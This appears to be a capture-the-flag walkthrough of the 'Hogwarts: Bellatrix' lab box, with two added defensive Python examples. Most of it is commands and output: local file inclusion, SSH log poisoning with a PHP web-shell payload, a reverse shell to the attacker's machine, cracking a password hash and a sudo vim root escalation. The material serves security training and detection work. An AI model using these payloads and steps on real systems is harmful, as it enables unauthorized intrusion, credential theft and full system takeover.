Hogwarts: Bellatrix
First of all, port scanning with nmap,
or you can use recon to save extra time and continue with your other tasks.
┌──(root@ghost)-[/home/ghost]
└─# recon bellatrix.vuln
[R3C0N] by 0bfxgh0st 4 WWA with ❤
Cyberapocalypse 2022 whoohoo !
[OS] Linux (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-10 21:20 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:20
Completed NSE at 21:20, 0.00s elapsed
Initiating ARP Ping Scan at 21:20
Scanning bellatrix.vuln (10.0.2.4) [1 port]
Completed ARP Ping Scan at 21:20, 0.01s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 21:20
Scanning bellatrix.vuln (10.0.2.4) [65535 ports]
Discovered open port 22/tcp on 10.0.2.4
Discovered open port 80/tcp on 10.0.2.4
Completed SYN Stealth Scan at 21:20, 1.39s elapsed (65535 total ports)
NSE: Script scanning 10.0.2.4.
Initiating NSE at 21:20
Completed NSE at 21:20, 0.00s elapsed
Nmap scan report for bellatrix.vuln (10.0.2.4)
Host is up (0.000061s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:FB:D3:69 (Oracle VirtualBox virtual NIC)
NSE: Script Post-scanning.
Initiating NSE at 21:20
Completed NSE at 21:20, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.59 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
[+] [fuzzin server]
http://bellatrix.vuln [200 OK] Apache[2.4.46], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.46 (Ubuntu)], IP[10.0.2.4], Title[AvadaKedavra]
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Jul 10 21:20:21 2022
URL_BASE: http://bellatrix.vuln:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://bellatrix.vuln:80/ ----
+ http://bellatrix.vuln:80/index.php (CODE:200|SIZE:1728)
+ http://bellatrix.vuln:80/server-status (CODE:403|SIZE:279)
-----------------
END_TIME: Sun Jul 10 21:20:22 2022
DOWNLOADED: 4612 - FOUND: 2
Okay, so we have two open tcp ports, 22 for ssh and 80 for the http web server, and our fuzzer found two URLs. Let's curl the site to see what happens.
┌──(root@ghost)-[/home/ghost]
└─# curl "http://bellatrix.vuln/index.php"
<p>ikilledsiriusblackikilledsiriusblackikilledsiriusblackikilledsiriusblack</p>
<p>ikilledsiriusblackikilledsiriusblackikilledsiriusblackikilledsiriusblack</p>
<p>ikilledsiriusblackikilledsiriusblackikilledsiriusblackikilledsiriusblack</p>
<p>ikilledsiriusblackikilledsiriusblackikilledsiriusblackikilledsiriusblack</p>
<p>ikilledsiriusblackikilledsiriusblackikilledsiriusblackikilledsiriusblack</p>
<p>ikilledsiriusblackikilledsiriusblackikilledsiriusblackikilledsiriusblack</p>
<p>ikilledsiriusblackikilledsiriusblackikilledsiriusblackikilledsiriusblack</p>
<p>ikilledsiriusblackikilledsiriusblackikilledsiriusblackikilledsiriusblack</p>
<p>ikilledsiriusblackikilledsiriusblackikilledsiriusblackikilledsiriusblack</p>
<p>ikilledsiriusblackikilledsiriusblackikilledsiriusblackikilledsiriusblack</p>
<p>ikilledsiriusblackikilledsiriusblackikilledsiriusblackikilledsiriusblack.php</p>
<!--
Nah...this time there are no clues in the source code ...
o yeah, maybe I've already told you a directory .php? :)
-->
/*
$file = $_GET['file'];
if(isset($file))
{
include("$file");
}
*/
At this point we have two 'hints'. Things seem very clear if you have basic knowledge of PHP and LFI, so let's give it a try.
┌──(root@ghost)-[/home/ghost]
└─# curl "http://bellatrix.vuln/ikilledsiriusblack.php?file=/etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:101:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:115::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:109:117:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:110:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:111:118:RealtimeKit,,,:/proc:/usr/sbin/nologin
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
avahi:x:113:120:Avahi mDNS daemon,,,:/run/avahi-daemon:/usr/sbin/nologin
cups-pk-helper:x:114:121:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:115:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:117:123::/var/lib/saned:/usr/sbin/nologin
nm-openvpn:x:118:124:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
whoopsie:x:119:125::/nonexistent:/bin/false
colord:x:120:126:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
sssd:x:121:127:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
geoclue:x:122:128::/var/lib/geoclue:/usr/sbin/nologin
pulse:x:123:129:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
hplip:x:124:7:HPLIP system user,,,:/run/hplip:/bin/false
gnome-initial-setup:x:125:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:126:131:Gnome Display Manager:/var/lib/gdm3:/bin/false
bellatrix:x:1000:1000:Bellatrix,,,:/home/bellatrix:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:127:65534::/run/sshd:/usr/sbin/nologin
lestrange:x:1001:1001::/home/lestrange:/bin/rbash
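The include("$file") pattern from the hint, modelled in Python beside a hardened resolver, as an added example (not code from the box or from the post). WEB_ROOT and the allowlist are assumed values; the point is that the GET parameter selects a key, never a path, and that the resolved target is still checked against the web root.

```python
import os

# Assumed layout for this example (not the box's real configuration):
# the include() target is chosen by a short key, never by a raw path.
WEB_ROOT = "/var/www/html"
ALLOWED_PAGES = {
    "home": "index.php",
    "about": "about.php",
}


def unsafe_resolve(file_param):
    """Mirror of include("$file"): the GET value becomes the path verbatim,
    so /etc/passwd, ../../../etc/shadow or php://filter/... all go through."""
    return file_param


def safe_resolve(file_param, web_root=WEB_ROOT, allowed=ALLOWED_PAGES):
    """Return the only file a given key may map to, or None.

    Two independent checks: (1) the key must be in the allowlist, so user
    input never becomes a path component; (2) the resolved target must still
    sit under web_root after symlinks and '..' are normalised, which also
    catches a misconfigured allowlist entry pointing outside the web root."""
    target = allowed.get(file_param)
    if target is None:
        return None
    root = os.path.realpath(web_root)
    path = os.path.realpath(os.path.join(root, target))
    if os.path.commonpath([root, path]) != root:
        return None
    return path


if __name__ == "__main__":
    # The probes used on this box: the vulnerable resolver passes them all.
    for probe in ("/etc/passwd", "/var/log/auth.log", "../../../etc/passwd",
                  "php://filter/convert.base64-encode/resource=index.php"):
        print(f"{probe!r}: unsafe -> {unsafe_resolve(probe)!r}, safe -> {safe_resolve(probe)!r}")
    print("home ->", safe_resolve("home"))
```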
For additional information gathering you can use lfienum.
┌──(root@ghost)-[/home/ghost]
└─# lfienum.py "http://bellatrix.vuln/ikilledsiriusblack.php?file="
[+] [LFI VULNERABLE] http://bellatrix.vuln/ikilledsiriusblack.php?file=/var/log/auth.log
Jul 7 20:05:03 bellatrix CRON[760]: pam_unix(cron:session): session opened for user root by (uid=0)
Jul 7 20:05:03 bellatrix CRON[760]: pam_unix(cron:session): session closed for user root
Jul 7 20:05:04 bellatrix systemd-logind[764]: New seat seat0.
Jul 7 20:05:04 bellatrix systemd-logind[764]: Watching system buttons on /dev/input/event0 (Power Button)
Jul 7 20:05:04 bellatrix systemd-logind[764]: Watching system buttons on /dev/input/event1 (Sleep Button)
Jul 7 20:05:04 bellatrix systemd-logind[764]: Watching system buttons on /dev/input/event2 (AT Translated Set 2 keyboard)
Jul 7 20:05:04 bellatrix gdm-launch-environment]: pam_unix(gdm-launch-environment:session): session opened for user gdm by (uid=0)
Jul 7 20:05:04 bellatrix systemd-logind[764]: New session c1 of user gdm.
Jul 7 20:05:04 bellatrix systemd: pam_unix(systemd-user:session): session opened for user gdm by (uid=0)
Jul 7 20:05:06 bellatrix polkitd(authority=local): Registered Authentication Agent for unix-session:c1 (system bus name :1.43 [/usr/bin/gnome-shell], object path /org/freedesktop/PolicyKit1/AuthenticationAgent, locale es_ES.UTF-8)
Jul 7 20:05:07 bellatrix realmd[1131]: Loaded settings from: /usr/lib/realmd/realmd-defaults.conf /usr/lib/realmd/realmd-distro.conf
Jul 7 20:05:07 bellatrix realmd[1131]: holding daemon: startup
Jul 7 20:05:07 bellatrix realmd[1131]: starting service
Jul 7 20:05:07 bellatrix realmd[1131]: connected to bus
Jul 7 20:05:07 bellatrix realmd[1131]: GLib-GIO: _g_io_module_get_default: Found default implementation local (GLocalVfs) for ‘gio-vfs’
Jul 7 20:05:07 bellatrix realmd[1131]: released daemon: startup
Jul 7 20:05:07 bellatrix realmd[1131]: claimed name on bus: org.freedesktop.realmd
Jul 7 20:05:29 bellatrix dbus-daemon[485]: [system] Failed to activate service 'org.bluez': timed out (service_start_timeout=25000ms)
Jul 7 20:06:09 bellatrix realmd[1131]: quitting realmd service after timeout
Jul 7 20:06:09 bellatrix realmd[1131]: stopping service
Jul 7 20:09:01 bellatrix CRON[1759]: pam_unix(cron:session): session opened for user root by (uid=0)
Jul 7 20:09:01 bellatrix CRON[1759]: pam_unix(cron:session): session closed for user root
Jul 7 20:16:12 bellatrix sshd[2008]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=10.0.2.15 user=bellatrix
Jul 7 20:16:14 bellatrix sshd[2008]: Failed password for bellatrix from 10.0.2.15 port 45040 ssh2
Jul 7 20:16:17 bellatrix sshd[2008]: Connection closed by authenticating user bellatrix 10.0.2.15 port 45040 [preauth]
Jul 7 20:17:01 bellatrix CRON[2012]: pam_unix(cron:session): session opened for user root by (uid=0)
Jul 7 20:17:01 bellatrix CRON[2012]: pam_unix(cron:session): session closed for user root
Jul 7 20:19:51 bellatrix sshd[2016]: Received disconnect from 10.0.2.15 port 45042:11: Bye Bye [preauth]
Jul 7 20:19:51 bellatrix sshd[2016]: Disconnected from authenticating user lestrange 10.0.2.15 port 45042 [preauth]
Jul 7 20:19:51 bellatrix sshd[2019]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=10.0.2.15 user=lestrange
Jul 7 20:19:51 bellatrix sshd[2018]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=10.0.2.15 user=lestrange
Jul 7 20:19:51 bellatrix sshd[2020]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=10.0.2.15 user=lestrange
Jul 7 20:19:51 bellatrix sshd[2021]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=10.0.2.15 user=lestrange
As we can see, /var/log/auth.log is readable. We should check whether the file is writable too (that is, whether our own input ends up in it), and then go from LFI to RCE by poisoning a log. In this case auth.log is poisonable.
I made this PoC some time ago to automate the process, lfi2rce.
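The detection side of the log poisoning described above, as an added example that is not part of the post or of the author's tools: it scans auth.log text for sshd entries whose username field carries a PHP tag (what the poisoning leaves behind) and counts failed password attempts per source IP. The log lines are constructed; the sshd message formats are assumed from standard OpenSSH output.

```python
import re
from collections import Counter

# Constructed sample of /var/log/auth.log (not captured from the box). Lines
# 1-3 mirror the failed logins seen through the LFI; lines 4-5 are the entries
# sshd writes when the *username* itself carries a PHP tag, which is exactly
# what turns a readable log into an executable one once include() loads it.
SAMPLE_AUTH_LOG = """\
Jul 7 20:19:51 bellatrix sshd[2019]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=10.0.2.15 user=lestrange
Jul 7 20:19:54 bellatrix sshd[2019]: Failed password for lestrange from 10.0.2.15 port 45046 ssh2
Jul 7 20:19:54 bellatrix sshd[2020]: Failed password for lestrange from 10.0.2.15 port 45048 ssh2
Jul 7 20:21:03 bellatrix sshd[2030]: Invalid user <?php system($_GET["cmd"]); ?> from 10.0.2.15 port 45060
Jul 7 20:21:05 bellatrix sshd[2030]: Failed password for invalid user <?php system($_GET["cmd"]); ?> from 10.0.2.15 port 45060 ssh2
"""

PHP_TAG = re.compile(r"<\?(?:php|=)?|\?>")
# Close to useradd's default NAME_REGEX: anything else never came from a real account.
VALID_USER = re.compile(r"^[a-z_][a-z0-9_-]{0,31}\$?$")
INVALID = re.compile(r"Invalid user (?P<user>.*?) from (?P<ip>\S+) port \d+")
FAILED = re.compile(r"Failed password for (?:invalid user )?(?P<user>.+?) from (?P<ip>\S+) port \d+")
PAM_FAIL = re.compile(r"pam_unix\(sshd:auth\): authentication failure;.*rhost=(?P<ip>\S*) user=(?P<user>.*)$")


def suspicious_username(user):
    """True when a username sshd logged verbatim looks like injected code."""
    return bool(PHP_TAG.search(user)) or not VALID_USER.match(user)


def analyze(log_text):
    """Scan auth.log text; return poisoned entries and failed logins per source IP."""
    poisoned = []         # (line_no, source_ip, username) for entries carrying code
    failures = Counter()  # one count per "Failed password" line, so the pam_unix
                          # line for the same attempt is not counted twice
    for n, line in enumerate(log_text.splitlines(), 1):
        match = None
        for rx in (INVALID, FAILED, PAM_FAIL):
            match = rx.search(line)
            if match:
                break
        if not match:
            continue
        user, ip = match.group("user"), match.group("ip")
        if rx is FAILED:
            failures[ip] += 1
        if suspicious_username(user):
            poisoned.append((n, ip, user))
    return {"poisoned": poisoned, "failures": failures}


if __name__ == "__main__":
    report = analyze(SAMPLE_AUTH_LOG)
    for n, ip, user in report["poisoned"]:
        print(f"line {n}: code-bearing username from {ip}: {user!r}")
    for ip, count in report["failures"].most_common():
        print(f"{ip}: {count} failed password attempts")
```

The real fix is on the application side (no user-controlled include()), and on the host side auth.log should not be readable by www-data at all; this scan just tells you whether the poisoning already happened.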
┌──(root@ghost)-[/home/ghost]
└─# lfi2rce.py "http://bellatrix.vuln/ikilledsiriusblack.php?file=" ssh 10.0.2.15 1337
lfi2rce ~by 0bfxgh0st*
Poison /var/log/auth.log
The authenticity of host 'bellatrix.vuln (10.0.2.4)' can't be established.
ED25519 key fingerprint is SHA256:I0jhHaNqig++DYBtm243KP9Od4nR7aTAqEzApdpuNxo.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'bellatrix.vuln' (ED25519) to the list of known hosts.
<?php system($_GET["cmd"]); ?>@bellatrix.vuln's password:
Permission denied, please try again.
<?php system($_GET["cmd"]); ?>@bellatrix.vuln's password:
Permission denied, please try again.
<?php system($_GET["cmd"]); ?>@bellatrix.vuln's password:
<?php system($_GET["cmd"]); ?>@bellatrix.vuln: Permission denied (publickey,password).
[+] Sending payload
listening on [any] 1337 ...
Jul 7 20:05:03 bellatrix CRON[760]: pam_unix(cron:session): session opened for user root by (uid=0)
Jul 7 20:05:03 bellatrix CRON[760]: pam_unix(cron:session): session closed for user root
Jul 7 20:05:04 bellatrix systemd-logind[764]: New seat seat0.
Jul 7 20:05:04 bellatrix systemd-logind[764]: Watching system buttons on /dev/input/event0 (Power Button)
Jul 7 20:05:04 bellatrix systemd-logind[764]: Watching system buttons on /dev/input/event1 (Sleep Button)
Jul 7 20:05:04 bellatrix systemd-logind[764]: Watching system buttons on /dev/input/event2 (AT Translated Set 2 keyboard)
Jul 7 20:05:04 bellatrix gdm-launch-environment]: pam_unix(gdm-launch-environment:session): session opened for user gdm by (uid=0)
Jul 7 20:05:04 bellatrix systemd-logind[764]: New session c1 of user gdm.
Jul 7 20:05:04 bellatrix systemd: pam_unix(systemd-user:session): session opened for user gdm by (uid=0)
Jul 7 20:05:06 bellatrix polkitd(authority=local): Registered Authentication Agent for unix-session:c1 (system bus name :1.43 [/usr/bin/gnome-shell], object path /org/freedesktop/PolicyKit1/AuthenticationAgent, locale es_ES.UTF-8)
Jul 7 20:05:07 bellatrix realmd[1131]: Loaded settings from: /usr/lib/realmd/realmd-defaults.conf /usr/lib/realmd/realmd-distro.conf
Jul 7 20:05:07 bellatrix realmd[1131]: holding daemon: startup
Jul 7 20:05:07 bellatrix realmd[1131]: starting service
Jul 7 20:05:07 bellatrix realmd[1131]: connected to bus
Jul 7 20:05:07 bellatrix realmd[1131]: GLib-GIO: _g_io_module_get_default: Found default implementation local (GLocalVfs) for ‘gio-vfs’
Jul 7 20:05:07 bellatrix realmd[1131]: released daemon: startup
Jul 7 20:05:07 bellatrix realmd[1131]: claimed name on bus: org.freedesktop.realmd
Jul 7 20:05:29 bellatrix dbus-daemon[485]: [system] Failed to activate service 'org.bluez': timed out (service_start_timeout=25000ms)
Jul 7 20:06:09 bellatrix realmd[1131]: quitting realmd service after timeout
Jul 7 20:06:09 bellatrix realmd[1131]: stopping service
Jul 7 20:09:01 bellatrix CRON[1759]: pam_unix(cron:session): session opened for user root by (uid=0)
Jul 7 20:09:01 bellatrix CRON[1759]: pam_unix(cron:session): session closed for user root
Jul 7 20:16:12 bellatrix sshd[2008]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=10.0.2.15 user=bellatrix
Jul 7 20:16:14 bellatrix sshd[2008]: Failed password for bellatrix from 10.0.2.15 port 45040 ssh2
Jul 7 20:16:17 bellatrix sshd[2008]: Connection closed by authenticating user bellatrix 10.0.2.15 port 45040 [preauth]
Jul 7 20:17:01 bellatrix CRON[2012]: pam_unix(cron:session): session opened for user root by (uid=0)
Jul 7 20:17:01 bellatrix CRON[2012]: pam_unix(cron:session): session closed for user root
Jul 7 20:19:51 bellatrix sshd[2016]: Received disconnect from 10.0.2.15 port 45042:11: Bye Bye [preauth]
Jul 7 20:19:51 bellatrix sshd[2016]: Disconnected from authenticating user lestrange 10.0.2.15 port 45042 [preauth]
Jul 7 20:19:51 bellatrix sshd[2019]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=10.0.2.15 user=lestrange
Jul 7 20:19:51 bellatrix sshd[2018]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=10.0.2.15 user=lestrange
Jul 7 20:19:51 bellatrix sshd[2020]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=10.0.2.15 user=lestrange
Jul 7 20:19:51 bellatrix sshd[2021]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=10.0.2.15 user=lestrange
Jul 7 20:19:54 bellatrix sshd[2019]: Failed password for lestrange from 10.0.2.15 port 45046 ssh2
Jul 7 20:19:54 bellatrix sshd[2020]: Failed password for lestrange from 10.0.2.15 port 45048 ssh2
Jul 7 20:19:54 bellatrix sshd[2018]: Failed password for lestrange from 10.0.2.15 port 45044 ssh2
www-data@bellatrix:/var/www/html$ ls -la
ls -la
total 732
drwxr-xr-x 3 root root 4096 Nov 28 2020 .
drwxr-xr-x 3 root root 4096 Nov 28 2020 ..
-rw-rw-r-- 1 bellatrix bellatrix 728806 Nov 27 2020 1c19c879fe8ef134c3e051c2d69c0c66.gif
drwxr-xr-x 2 root root 4096 Nov 28 2020 c2VjcmV0cw==
-rw-rw-r-- 1 bellatrix bellatrix 151 Nov 28 2020 ikilledsiriusblack.php
-rw-rw-r-- 1 bellatrix bellatrix 1728 Nov 28 2020 index.php
www-data@bellatrix:/var/www/html$ echo "c2VjcmV0cw==" | base64 -d
echo "c2VjcmV0cw==" | base64 -d
secretswww-data@bellatrix:/var/www/html$ cd c2VjcmV0cw==
cd c2VjcmV0cw==
www-data@bellatrix:/var/www/html/c2VjcmV0cw==$ ls -la
ls -la
total 16
drwxr-xr-x 2 root root 4096 Nov 28 2020 .
drwxr-xr-x 3 root root 4096 Nov 28 2020 ..
-rw-r--r-- 1 root root 1237 Nov 28 2020 .secret.dic
-rw-r--r-- 1 root root 117 Nov 28 2020 Swordofgryffindor
www-data@bellatrix:/var/www/html/c2VjcmV0cw==$ cat Swordofgryffindor
cat Swordofgryffindor
lestrange:$6$1eIjsdebFF9/rsXH$NajEfDYUP7p/sqHdyOIFwNnltiRPwIU0L14a8zyQIdRUlAomDNrnRjTPN5Y/WirDnwMn698kIA5CV8NLdyGiY0
www-data@bellatrix:/var/www/html/c2VjcmV0cw==$
At this point we have a dictionary and a salted hash (sha512crypt) of a Linux user's password; we can try to brute-force the ssh login or simply crack the hash with john.
┌──(root@ghost)-[/home/ghost]
└─# john --wordlist=secret.dic hash
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
ihateharrypotter (lestrange)
1g 0:00:00:00 DONE (2022-07-11 08:59) 5.263g/s 600.0p/s 600.0c/s 600.0C/s gryffondor..wingardiumleviosa
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
We found valid credentials; let's try to log in over ssh.
┌──(root@ghost)-[/home/ghost]
└─# ssh lestrange@bellatrix.vuln
lestrange@bellatrix.vuln's password:
Welcome to Ubuntu 20.10 (GNU/Linux 5.8.0-29-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
38 actualizaciones se pueden instalar inmediatamente.
0 de estas actualizaciones son una actualización de seguridad.
Para ver estas actualizaciones adicionales ejecute: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Your Ubuntu release is not supported anymore.
For upgrade information, please visit:
http://www.ubuntu.com/releaseendoflife
New release '21.10' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Mon Jul 11 15:06:59 2022 from 10.0.2.15
lestrange@bellatrix:~$
At this point we can move through the user home folders and find the user flag easily.
lestrange@bellatrix:~$ cat /home/bellatrix/flag.txt
user: {69e0f71f25ece4351e4d73af430bec43}
Time to level up to root; let's check sudo -l.
lestrange@bellatrix:~$ sudo -l
Coincidiendo entradas por defecto para lestrange en bellatrix:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
El usuario lestrange puede ejecutar los siguientes comandos en bellatrix:
(ALL : ALL) NOPASSWD: /usr/bin/vim
As we can see, /usr/bin/vim can be executed as root without a password, and there is an easy way to abuse this. Check the GTFOBins documentation, or you can use gtfobins-webcrawler.
[Sudo]
If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
sudo vim -c ':!/bin/sh'
lestrange@bellatrix:~$ sudo vim -c ':!/bin/sh'
# whoami
root
# ls -la /root/
total 56
drwx------ 7 root root 4096 nov 28 2020 .
drwxr-xr-x 20 root root 4096 nov 27 2020 ..
-rw------- 1 root root 1252 nov 28 2020 .bash_history
-rw-r--r-- 1 root root 3106 ago 14 2019 .bashrc
drwx------ 7 root root 4096 nov 28 2020 .cache
drwx------ 6 root root 4096 nov 27 2020 .config
drwx------ 3 root root 4096 nov 27 2020 .dbus
drwx------ 3 root root 4096 nov 27 2020 .local
-rw-r--r-- 1 root root 161 sep 16 2020 .profile
-rw-r--r-- 1 root root 680 nov 28 2020 root.txt
-rwxr-xr-x 1 root root 47 nov 28 2020 script.sh
-rw-r--r-- 1 root root 66 nov 28 2020 .selected_editor
drwxr-xr-x 3 root root 4096 nov 28 2020 snap
-rw------- 1 root root 806 nov 28 2020 .viminfo
# cat /root/root.txt
root{ead5a85a11ba466011fced308d460a76}